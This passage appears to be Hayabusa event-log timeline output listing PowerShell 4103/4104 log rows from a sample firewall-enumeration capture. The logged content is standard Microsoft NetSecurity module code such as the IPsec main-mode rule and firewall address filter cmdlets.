($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.817 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetAddressFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallAddressFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByAddress"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetConSecRuleFilterByAddress"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecRule""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetMainModeRuleFilterByAddress"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecMainModeRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecMainModeRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata Aliases=""LocalIP"" PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata Aliases=""RemoteIP"" PSName=""RemoteAddress""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallAddressFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.832 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetAddressFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallAddressFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 